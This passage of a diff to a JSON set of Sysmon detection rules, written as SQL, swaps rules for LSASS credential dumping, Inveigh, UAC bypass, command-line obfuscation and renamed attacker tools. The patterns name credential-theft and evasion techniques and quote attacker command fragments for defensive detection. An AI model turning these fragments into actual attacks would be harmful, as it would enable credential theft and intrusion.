"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": 
"proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "status": "experimental", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": 
"proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or 
executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR 
CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' 
OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - 
"status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. 
Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities 
supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", + "attack.defense_evasion", "attack.t1059.001", + "attack.t1027" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + ], + "filename": 
"proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" + }, + { + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1553.004" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + 
"description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" 
binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - 
"attack.t1543.003", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do 
